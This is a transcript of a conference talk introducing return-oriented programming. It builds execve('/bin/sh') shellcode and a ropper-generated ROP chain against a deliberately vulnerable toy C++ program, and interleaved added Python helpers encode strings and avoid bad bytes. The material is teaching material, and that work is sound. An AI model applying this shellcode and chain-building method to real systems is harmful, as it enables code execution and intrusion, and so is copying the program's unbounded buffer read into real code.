TurtleSec (@pati_gallardo)
Warning!
This presentation has A LOT of assembly
Run while you have the chance
Return Oriented Programming
an introduction
NDC Security 2023
Patricia Aas
Patricia Aas - Trainer & Consultant
C++ Programmer, Application Security
Currently: TurtleSec
Previously: Vivaldi, Cisco Systems, Knowit, Opera Software
Master in Computer Science
Pronouns: she/they
Semi-Artisanal ROP
The application

target.cpp (example program by @olvemaudal):

#include <cstdio>
#include <cstring>
#include <iostream>

void launch_missiles(int n) {
  printf("Launching %d missiles\n", n);
}

void authenticate_and_launch() {
  int n_missiles = 2;
  bool allowaccess = false;
  char response[110];
  printf("Secret: ");
  std::cin >> response;

  if (strcmp(response, "Joshua") == 0)
    allowaccess = true;

  if (allowaccess) {
    puts("Access granted");
    launch_missiles(n_missiles);
  }

  if (!allowaccess)
    puts("Access denied");
}

int main() {
  puts("WarGames MissileLauncher v0.1");
  authenticate_and_launch();
  puts("Operation complete");
}
The Programmer's Mental State Machine (diagram): at the "Secret:" prompt, the input "Joshua" leads to Access granted, Launching missiles and Operation complete; any other input, such as "David", leads to Access denied and Operation complete.
The vulnerability

In target.cpp above, response is a stack-allocated buffer of 110 bytes, and std::cin >> response copies the whole whitespace-delimited token into it with no length bound. A longer secret runs past the end of the buffer and overwrites whatever lies above it on the stack, up to and including the saved return address of authenticate_and_launch. This is a stack buffer overflow.
The Weird Machine (diagram; imagine a smaller buffer): the same state machine as before, plus a Weird State the programmer never intended, reached by an over-long secret such as "globalthermonuclearwar". In the diagram the program simply terminates from there; the rest of this talk is about steering that state instead.
Our x86 32-bit shellcode for Linux
Shellcode
Piece of code, typically in machine code,
that is delivered and executed as a part of an exploit.
Called “shellcode” because a traditional use was
to start a shell, for example sh.
In real exploits it will deliver some kind of mechanism for
further (remote) compromise of the system.
Shellcode - code that gives you shell

int execve(const char *filename,
           char *const argv[],
           char *const envp[]);

(diagram: the target process starts out running the vulnerable program; once the shellcode calls execve, the same process runs /bin/sh instead)
The Plan

1. Write C code for shellcode
2. Test C code
3. Write inline assembly
4. Test asm code
5. Create ROP chain
6. Test ROP chain
Write C code for shellcode

shellcode.c (close, open, execve):

#include <fcntl.h>
#include <unistd.h>

int main(void) {
  int fd = 0;
  close(fd);
  const char *filename = "/dev/tty";
  int flag = O_RDONLY;
  open(filename, flag);
  const char *name = "/bin/sh";
  char *const *argv = NULL;
  char *const *envp = NULL;
  execve(name, argv, envp);
}

Why close(0) followed by open("/dev/tty"): open returns the lowest free descriptor, so the terminal becomes the new fd 0 and the spawned shell reads its commands from the terminal rather than from the exhausted stdin the exploit string was piped in through.
Test C code for shellcode

$ gcc -Wno-incompatible-pointer-types -m32 -o shellcode shellcode.c
$ ./shellcode
$
Registers

(diagram: eax, ebx, ecx and edx are 32-bit registers; their low 16 bits are ax, bx, cx and dx, which split into the 8-bit halves ah/al, bh/bl, ch/cl and dh/dl)

x86 32-bit Linux syscall convention

eax: syscall number
ebx: 1st argument
ecx: 2nd argument
edx: 3rd argument

The syscall is entered with int 0x80 and its return value comes back in eax. (esi, edi and ebp would carry arguments 4 to 6; none of the calls here need them.)
close - calling convention

int fd = 0;
close(fd);

eax: syscall number = 0x06
ebx: 1st argument = unsigned int fd
ecx: not in use
edx: not in use
close asm

eax: syscall number = 0x06
ebx: 1st argument = unsigned int fd

"xor eax, eax\n\t"    // Zero out
"mov eax, 0x06\n\t"   // Set eax to syscall number (0x06)
"xor ebx, ebx\n\t"    // Zero out ebx - file descriptor
"int 0x80\n\t"        // Invoke syscall
close - register state after each instruction

xor eax, eax    eax = 0x00
mov eax, 0x06   eax = 0x06
xor ebx, ebx    ebx = 0x00
int 0x80        syscall registers: eax = syscall number, ebx = unsigned int fd
open - calling convention

const char *filename = "/dev/tty";
int flag = O_RDONLY;
open(filename, flag);

eax: syscall number = 0x05
ebx: 1st argument = const char *filename
ecx: 2nd argument = int flags
edx: 3rd argument = umode_t mode (only used together with O_CREAT, so it is zeroed here)
Stack manipulation

esp is the stack pointer (sp is its low 16 bits). As instructions like push and pop are executed, esp is updated so that it always points to the "top of the stack". On x86 the stack grows towards lower addresses: push decrements esp by 4 and stores the value there, pop loads the value at esp and increments esp by 4. That is why the string in the next listing is pushed back to front, the terminator first and the first four characters last, leaving esp pointing at the start of the string.
open asm

eax: syscall number = 0x05
ebx: 1st argument = const char *filename
ecx: 2nd argument = int flags
edx: 3rd argument = umode_t mode

"xor eax, eax\n\t"          // Zero out
"mov eax, 0x05\n\t"         // Set eax to syscall number (0x05)
"xor ebx, ebx\n\t"          // Zero out
"push ebx\n\t"              // Push null terminator
"mov ebx, 0x7974742f\n\t"   // "ytt/" (little-endian, reads "/tty" in memory)
"push ebx\n\t"              // Part two of the string
"mov ebx, 0x7665642f\n\t"   // "ved/" (little-endian, reads "/dev" in memory)
"push ebx\n\t"              // Part one of the string
"mov ebx, esp\n\t"          // Put pointer in ebx
"xor ecx, ecx\n\t"          // Zero out (O_RDONLY is 0)
"xor edx, edx\n\t"          // Zero out
"int 0x80\n\t"              // Invoke syscall
open - register and stack state after each instruction

xor eax, eax          eax = 0x00
mov eax, 0x05         eax = 0x05
xor ebx, ebx          ebx = 0x00000000
push ebx              stack: 00 00 00 00 (terminator)
mov ebx, 0x7974742f   ebx = 0x7974742f
push ebx              stack: 2f 74 74 79 "/tty", then the terminator
mov ebx, 0x7665642f   ebx = 0x7665642f
push ebx              stack: 2f 64 65 76 "/dev", "/tty", terminator: "/dev/tty\0"
mov ebx, esp          ebx = esp, the address of the string
xor ecx, ecx          ecx = 0x00 (O_RDONLY)
xor edx, edx          edx = 0x00
int 0x80              syscall registers: eax = syscall number, ebx = const char *filename, ecx = int flags, edx = umode_t mode
execve - calling convention

const char *name = "/bin/sh";
char *const *argv = NULL;
char *const *envp = NULL;
execve(name, argv, envp);

eax: syscall number = 0x0b
ebx: 1st argument = const char *name
ecx: 2nd argument = const char *const *argv
edx: 3rd argument = const char *const *envp
execve asm

eax: syscall number = 0x0b
ebx: 1st argument = const char *name
ecx: 2nd argument = const char *const *argv
edx: 3rd argument = const char *const *envp

"xor eax, eax\n\t"          // Zero out
"mov eax, 0x0b\n\t"         // Set eax to syscall number (0x0b)
"xor ebx, ebx\n\t"          // Zero out
"push ebx\n\t"              // Push null terminator
"mov ebx, 0x68732f2f\n\t"   // "hs//" (little-endian, reads "//sh" in memory)
"push ebx\n\t"              // Part two of the string
"mov ebx, 0x6e69622f\n\t"   // "nib/" (little-endian, reads "/bin" in memory)
"push ebx\n\t"              // Part one of the string
"mov ebx, esp\n\t"          // Put pointer in ebx
"xor ecx, ecx\n\t"          // Zero out (argv = NULL)
"xor edx, edx\n\t"          // Zero out (envp = NULL)
"int 0x80\n\t"              // Invoke syscall

The extra slash pads "/bin/sh" (7 bytes) to the 8 bytes "/bin//sh", so the path is exactly two dwords plus a zero dword and no immediate has to contain a NUL byte; "/bin//sh" names the same file.
execve - register and stack state after each instruction

xor eax, eax          eax = 0x00
mov eax, 0x0b         eax = 0x0b
xor ebx, ebx          ebx = 0x00000000
push ebx              stack: 00 00 00 00 (terminator)
mov ebx, 0x68732f2f   ebx = 0x68732f2f
push ebx              stack: 2f 2f 73 68 "//sh", then the terminator
mov ebx, 0x6e69622f   ebx = 0x6e69622f
push ebx              stack: 2f 62 69 6e "/bin", "//sh", terminator: "/bin//sh\0"
mov ebx, esp          ebx = esp, the address of the string
xor ecx, ecx          ecx = 0x00
xor edx, edx          edx = 0x00
int 0x80              syscall registers: eax = syscall number, ebx = const char *name, ecx = const char *const *argv, edx = const char *const *envp
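As an added example (my code, not from the talk), the string splitting that the open and execve shellcode above does by hand, generalised to any path: split_cstring turns a string into the little-endian dwords as they must sit in memory, push_order reverses them for the stack, and push_asm emits the same mov/push sequence the slides use. A length that is not a multiple of four is padded with leading slashes ("//bin/sh", the layout the ropper chain uses later); the hand-written execve shellcode puts its extra slash in the middle ("/bin//sh"), which is the same file. The function names are my own.

```python
import struct


def split_cstring(s: str, pad: str = "/") -> list:
    """Split a string into little-endian 32-bit words in memory order
    (first word = first four bytes) and append a zero word as the NUL
    terminator. A length that is not a multiple of four is padded with
    extra slashes, which name the same file for an absolute path.
    (Added helper, not code from the talk.)"""
    raw = s.encode()
    rem = len(raw) % 4
    if rem:
        if not s.startswith("/"):
            raise ValueError("slash padding only works for absolute paths")
        raw = pad.encode() * (4 - rem) + raw        # "/bin/sh" -> "//bin/sh"
    words = [struct.unpack("<I", raw[i:i + 4])[0] for i in range(0, len(raw), 4)]
    return words + [0]                               # terminator as a whole dword


def push_order(words: list) -> list:
    """push moves esp down, so the last word in memory (the terminator)
    has to be pushed first and the first word last; esp then points at
    the start of the string."""
    return list(reversed(words))


def memory_image(words: list) -> bytes:
    """The bytes as they end up in memory, lowest address first."""
    return b"".join(struct.pack("<I", w) for w in words)


def as_chars(word: int) -> str:
    """Render an immediate as the characters it holds in memory, e.g. "/tty"."""
    return struct.pack("<I", word).decode("latin-1")


def push_asm(s: str, reg: str = "ebx") -> list:
    """Emit the mov/push sequence that builds the string on the stack and
    leaves its address in reg, as in the open and execve shellcode."""
    words = push_order(split_cstring(s))
    lines = [f"xor {reg}, {reg}", f"push {reg}"]     # NUL terminator first
    for w in words[1:]:                              # then the text, last word first
        lines += [f"mov {reg}, {w:#010x}", f"push {reg}"]
    lines.append(f"mov {reg}, esp")                  # pointer to the string
    return lines


if __name__ == "__main__":
    for path in ("/dev/tty", "/bin/sh"):
        words = split_cstring(path)
        print(path, [f"{w:#010x}" for w in words], memory_image(words))
        print("\n".join(push_asm(path)))
```

For "/dev/tty" push_asm reproduces lines 3 to 9 of the open shellcode above, immediates included; the same code applied to "/bin/sh" gives the "//bin/sh" layout rather than the slide's "/bin//sh".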
Write inline assembly

shellcode_asm.c (close, open, execve):

int main(void) {
  __asm__(
    ".intel_syntax noprefix\n\t"
    "xor eax, eax\n\t"          // Zero out
    "mov eax, 0x06\n\t"         // Set eax to syscall number (0x06)
    "xor ebx, ebx\n\t"          // Zero out ebx - file descriptor
    "int 0x80\n\t"              // Invoke syscall
    "xor eax, eax\n\t"          // Zero out
    "mov eax, 0x05\n\t"         // Set eax to syscall number (0x05)
    "xor ebx, ebx\n\t"          // Zero out
    "push ebx\n\t"              // Push null terminator
    "mov ebx, 0x7974742f\n\t"   // "ytt/"
    "push ebx\n\t"              // Part two of the string
    "mov ebx, 0x7665642f\n\t"   // "ved/"
    "push ebx\n\t"              // Part one of the string
    "mov ebx, esp\n\t"          // Put pointer in ebx
    "xor ecx, ecx\n\t"          // Zero out
    "xor edx, edx\n\t"          // Zero out
    "int 0x80\n\t"              // Invoke syscall
    "xor eax, eax\n\t"          // Zero out
    "mov eax, 0x0b\n\t"         // Set eax to syscall number (0x0b)
    "xor ebx, ebx\n\t"          // Zero out
    "push ebx\n\t"              // Push null terminator
    "mov ebx, 0x68732f2f\n\t"   // "hs//"
    "push ebx\n\t"              // Part two of the string
    "mov ebx, 0x6e69622f\n\t"   // "nib/"
    "push ebx\n\t"              // Part one of the string
    "mov ebx, esp\n\t"          // Put pointer in ebx
    "xor ecx, ecx\n\t"          // Zero out
    "xor edx, edx\n\t"          // Zero out
    "int 0x80\n\t"              // Invoke syscall
  );
}

This is built with clang below. With gcc, end the block with ".att_syntax prefix\n\t" (or build with -masm=intel): the compiler emits AT&T syntax for the code after the asm statement, and the assembler would still be in Intel mode.
Test asm code for shellcode

$ clang -m32 -o shellcode_asm shellcode_asm.c
$ ./shellcode_asm
$
ROP

Return Oriented Programming: when your stack is not executable. With a non-executable stack (NX), the bytes of the shellcode above cannot simply be placed in the buffer and jumped to; instead the same three syscalls are assembled out of instruction sequences that already exist in the executable's code pages.
Foundational idea:
The ret instruction transfers execution to
the (return) address located on the stack
(diagram: a ret instruction being executed. The stack holds <addr 1>, <addr 2>, ... with the stack pointer at <addr 1>. ret pops <addr 1> into the instruction pointer, leaving the stack pointer at <addr 2>, and execution continues at <addr 1> in RX memory, here the sequence xor eax, eax; ret, which sets eax to 0x00000000 and whose own ret then pops <addr 2>.)
The Stack Buffer Overflow

(diagram: the stack at the time of the overflow. The stack-allocated buffer is filled with padding ([0] to [3]); the slot that held the return address now holds Gadget 1 addr ([4]); the rest of the ROP chain follows above it: [5] Gadget 2 addr, [6] Gadget 3 addr, [7] Gadget 4 addr, [8] Gadget 5 addr, [9] Gadget 6 addr. Each gadget address points into RX memory at a short sequence <instructions>; ret;, and each ret pops the next gadget address off the stack.)
Put it all into the exploit string

exploit string = Padding | ROP Chain (Gadget 1, Gadget 2, Gadget 3, Gadget 4, Gadget 5, ...)
Script: rop_chain.py

#!/usr/bin/env python2
from struct import pack

rop = ''
rop += '\x90'*130  # Padding up to the return address; measure it with pattern_create/pattern_offset

# TODO : Put in ROP chain here

print(rop)  # Padding followed by the ROP chain goes to stdout
Using ropper to generate a ROP chain

$ ropper --file target --chain execve --badbytes 00090b20
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] filtering badbytes... 100%
[LOAD] removing double gadgets... 100%
[INFO] ROPchain Generator for syscall execve:
[INFO]
write command into data section
eax 0xb
ebx address to cmd
ecx address to null
edx address to null
[INFO] Try to create chain which fills registers without delete
content of previous filled registers
[*] Try permuation 1 / 24
[INFO] Look for syscall gadget
[INFO] syscall gadget found
[INFO] generating rop chain

--badbytes 00090b20 keeps NUL, tab, vertical tab and space out of every address and value in the chain: the payload arrives through std::cin >> response, which stops at the first whitespace character, and response is a C string, which ends at the first NUL.
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # 14e751855dc7dea49f8c9c0e10a22363f36ee225cb9bfee3b663fa039ac8a9ea
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = ''
[... ROP CHAIN ...]
print(rop)
[INFO] rop chain generated!
The ROP Chain

rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret;
rop += '//bi'
rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
rop += rebase_0(0x001ca060)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret;
rop += 'n/sh'
rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
rop += rebase_0(0x001ca064)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x0000ddf4) # 0x08055df4: xor eax, eax; ret;
rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
rop += rebase_0(0x001ca068)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x001ca060)
rop += rebase_0(0x00004c88) # 0x0804cc88: pop ecx; ret;
rop += rebase_0(0x001ca068)
rop += rebase_0(0x000f9715) # 0x08141715: pop edx; xor eax, eax; pop edi; ret;
rop += rebase_0(0x001ca068)
rop += p(0xdeadbeef)
rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret;
rop += p(0xfffffff5)
rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret;
rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret;
ROP chain gadgets (file offsets; rebased by IMAGE_BASE_0 = 0x08048000 in the script)

1. 0x000ae1aa: pop eax; ret;
2. 0x000a2c66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
3. 0x0001730c: mov dword ptr [edx], eax; ret;
4. 0x0000ddf4: xor eax, eax; ret; (0x08055df4 once rebased)
5. 0x0000101e: pop ebx; ret;
6. 0x00004c88: pop ecx; ret;
7. 0x000f9715: pop edx; xor eax, eax; pop edi; ret;
8. 0x000df9d3: neg eax; ret;
9. 0x00113f80: int 0x80; ret;
Running the chain, step by step (the original slides show the stack, the registers, RW memory and RX memory at each step; all offsets are rebased by IMAGE_BASE_0 = 0x08048000 in the script)

Step 1: write "//bi". pop eax; ret (0x000ae1aa) pops the four bytes '//bi' into eax. pop edx; pop ebx; pop esi; pop edi; pop ebp; ret (0x000a2c66) pops 0x001ca060, a writable address in the data section, into edx and the four 0xdeadbeef fillers into ebx, esi, edi and ebp. mov dword ptr [edx], eax; ret (0x0001730c) stores eax to RW memory at 0x001ca060.

Step 2: write "n/sh". The same three gadgets again, with 'n/sh' and 0x001ca064: after the store, RW memory at 0x001ca060 reads "//bin/sh".

Step 3: write the terminator. xor eax, eax; ret (0x0000ddf4) clears eax, the five-pop gadget puts 0x001ca068 into edx, and mov dword ptr [edx], eax; ret stores 0x00000000 at 0x001ca068. RW memory now holds the C string "//bin/sh\0" followed by a zero dword.

Step 4: load the syscall registers. pop ebx; ret (0x0000101e) puts 0x001ca060, the string, into ebx. pop ecx; ret (0x00004c88) puts 0x001ca068 into ecx. pop edx; xor eax, eax; pop edi; ret (0x000f9715) puts 0x001ca068 into edx, clears eax and pops a 0xdeadbeef filler into edi. pop eax; ret (0x000ae1aa) loads 0xfffffff5, and neg eax; ret (0x000df9d3) turns it into 0x0b.

Step 5: int 0x80; ret (0x00113f80) enters the kernel with the execve registers: eax = 0x0b (syscall number), ebx = const char *name (0x001ca060, "//bin/sh"), ecx = const char *const *argv (0x001ca068), edx = const char *const *envp (0x001ca068). Both argv and envp point at the zero dword, i.e. at an array whose first entry is NULL; where the C shellcode passed NULL pointers, the generated chain passes empty arrays, which execve accepts as well.
Finding Gadgets
close gadgets

1. 0x000ae1aa: pop eax; ret;
8. 0x000df9d3: neg eax; ret;
9. 0x00113f80: int 0x80; ret;

Syscall registers: eax = syscall number, ebx = unsigned int fd

# 1. Zero out ebx
# TODO

# 2. Put value in eax ( neg(0xfffffffa) = 0x06 )
rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret;
rop += p(0xfffffffa)

# 3. Negate value in eax
rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret;

# 4. Syscall
rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret;

Missing: xor ebx, ebx; ret;

The pop/neg detour exists because of the bad bytes: the dword for 0x06 is 06 00 00 00, three NULs that would end the string std::cin reads, whereas 0xfffffffa is fa ff ff ff, and negating it in eax yields 0x06. The generated execve chain does the same with 0xfffffff5 for 0x0b.
open gadgets

1. 0x000ae1aa: pop eax; ret;
2. 0x000a2c66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
3. 0x0001730c: mov dword ptr [edx], eax; ret;
4. 0x0000ddf4: xor eax, eax; ret; (0x08055df4 once rebased)
5. 0x0000101e: pop ebx; ret;
8. 0x000df9d3: neg eax; ret;
9. 0x00113f80: int 0x80; ret;

# 11. Zero out ecx
# TODO

# 12. Zero out edx
# TODO

Missing: xor ecx, ecx; ret;
Missing: xor edx, edx; ret;
execve gadgets (from the generated ROP chain)

1. 0x000ae1aa: pop eax; ret;
2. 0x000a2c66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
3. 0x0001730c: mov dword ptr [edx], eax; ret;
4. 0x0000ddf4: xor eax, eax; ret; (0x08055df4 once rebased)
5. 0x0000101e: pop ebx; ret;
6. 0x00004c88: pop ecx; ret;
7. 0x000f9715: pop edx; xor eax, eax; pop edi; ret;
8. 0x000df9d3: neg eax; ret;
9. 0x00113f80: int 0x80; ret;
Missing 3 gadgets
xor ebx, ebx; ret;
xor ecx, ecx; ret;
xor edx, edx; ret;
Searching for the missing gadgets

$ ropper --file target --search "xor ebx, ebx"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: xor ebx, ebx
[INFO] File: target
0x0811e009: xor ebx, ebx; jmp edx;
0x080ee378: xor ebx, ebx; mov eax, ebx; pop ebx; pop esi; pop edi; ret;
0x0815b675: xor ebx, ebx; mov eax, ecx; int 0x80;
0x080f8a7e: xor ebx, ebx; mov eax, edx; int 0x80;
0x0816abcb: xor ebx, ebx; mov esi, 8; mov dword ptr [esp + 0xc], edx; mov eax, 0xaf; lea ecx, [ecx - 0x5c874]; call dword ptr gs:[0x10];
0x080b4fce: xor ebx, ebx; movsx eax, al; pop ecx; push eax; push esi; call dword ptr [edx + 8];
0x08168060: xor ebx, ebx; movzx eax, byte ptr [edi + eax - 0x20]; mov edi, dword ptr [esp + 0xc]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax;
0x081680ac: xor ebx, ebx; movzx eax, byte ptr [edx + eax - 0x20]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax;
0x0807466c: xor ebx, ebx; push eax; push edi; call dword ptr [edx + 8];
0x080d5b4d: xor ebx, ebx; push ecx; call dword ptr [eax + 0x18];
0x0808a868: xor ebx, ebx; push edx; push edi; call dword ptr [eax + 0x18];
0x0804cc9a: xor ebx, ebx; ret;
All 3 are present in the binary

xor ebx, ebx; ret;   0x0804cc9a
xor ecx, ecx; ret;   0x0804ccad
xor edx, edx; ret;   0x0804ccc0
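An added example (my code, not from the talk) of the encoding trick the close gadgets rely on and of the check every chain should pass before it goes through std::cin: bad_byte_offsets reports where a payload contains a byte the input path would swallow, load_eax picks pop eax directly or pop plus neg eax depending on whether the dword is clean, and close_chain assembles the complete close(0) chain, filling in the TODO from the close gadgets slide with the xor ebx, ebx; ret gadget just found at 0x0804cc9a. The bad-byte set is larger than the 00090b20 passed to ropper: operator>> stops at every isspace() character, so 0x0a, 0x0c and 0x0d are excluded too. Gadget offsets are the ones from the listings; the function names are mine.

```python
import struct

# Bytes the payload must not contain: it reaches the program through
# std::cin >> response, which stops at whitespace, and response is a C
# string, which ends at the first NUL. The talk passed --badbytes 00090b20
# to ropper; this set also covers the other isspace() characters.
# (Added example, not code from the talk.)
BADBYTES = bytes([0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20])

IMAGE_BASE_0 = 0x08048000                 # from the ropper script

# Gadget file offsets from the talk's listings. The xor ebx gadget is the
# absolute address ropper --search printed, so it is not rebased.
POP_EAX, NEG_EAX, INT80 = 0x000ae1aa, 0x000df9d3, 0x00113f80
XOR_EBX_EBX_ABS = 0x0804cc9a


def p(x: int) -> bytes:
    return struct.pack("<I", x & 0xffffffff)


def rebase_0(x: int) -> bytes:
    return p(x + IMAGE_BASE_0)


def bad_byte_offsets(blob: bytes, bad: bytes = BADBYTES) -> list:
    """Offsets of every byte in blob that the input path would cut or skip."""
    return [i for i, b in enumerate(blob) if b in bad]


def load_eax(value: int, bad: bytes = BADBYTES) -> list:
    """Gadget steps (offset, immediate-or-None) that leave `value` in eax
    with no bad byte on the stack: pop it directly when its encoding is
    clean, otherwise pop the two's-complement negation and fix it up with
    neg eax, the trick used for 0x06 (close) and 0x0b (execve)."""
    if not bad_byte_offsets(p(value), bad):
        return [(POP_EAX, value)]
    negated = (-value) & 0xffffffff
    if not bad_byte_offsets(p(negated), bad):
        return [(POP_EAX, negated), (NEG_EAX, None)]
    raise ValueError(f"{value:#x}: neither the value nor its negation is clean")


def emit(steps: list) -> bytes:
    """Serialise (offset, immediate) steps: gadget address, then its operand."""
    rop = b""
    for offset, imm in steps:
        rop += rebase_0(offset)
        if imm is not None:
            rop += p(imm)
    return rop


def close_chain() -> bytes:
    """close(0): ebx = 0 via xor ebx, ebx; eax = 6 via pop/neg; int 0x80."""
    return p(XOR_EBX_EBX_ABS) + emit(load_eax(0x06)) + emit([(INT80, None)])


if __name__ == "__main__":
    chain = close_chain()
    print(chain.hex(), "bad bytes at:", bad_byte_offsets(chain))
```

Run bad_byte_offsets over the whole stdin payload, padding included (0x90 is clean), not just the chain; a single offending byte means std::cin truncates the string and the return address never gets overwritten with a gadget.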
Test ROP Chain

$ ./rop_chain.py > rop_chain_file
$ gdb -q target
Reading symbols from target...
(gdb) r < rop_chain_file
Starting program: target < advanced_ropper_file
WarGames MissileLauncher v0.1
Secret: Access granted
Launching -1869574000 missiles
Access denied
process 3279834 is executing new program: /usr/bin/dash
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
$

Reading the output: the padding has run over the locals, so n_missiles prints as 0x90909090 (-1869574000 as a signed int), and allowaccess evidently holds a padding byte as well; a bool whose object representation is neither 0 nor 1 is undefined behaviour, which is how both "Access granted" and "Access denied" get printed. When authenticate_and_launch returns into the chain, the process is replaced by /usr/bin/dash (what //bin/sh resolves to on this system) and the shell prompt appears.
We got shell!
Thank You!
Questions?
Photos from pixabay.com
Patricia Aas, TurtleSec
I'm "sorry" <3

I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)
 
Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdf
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019)
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)
 

Recently uploaded

OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024
OpenMetadata
 
Fundamentals of Programming and Language Processors
Fundamentals of Programming and Language ProcessorsFundamentals of Programming and Language Processors
Fundamentals of Programming and Language Processors
Rakesh Kumar R
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
timtebeek1
 
DDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systemsDDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systems
Gerardo Pardo-Castellote
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOMLORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
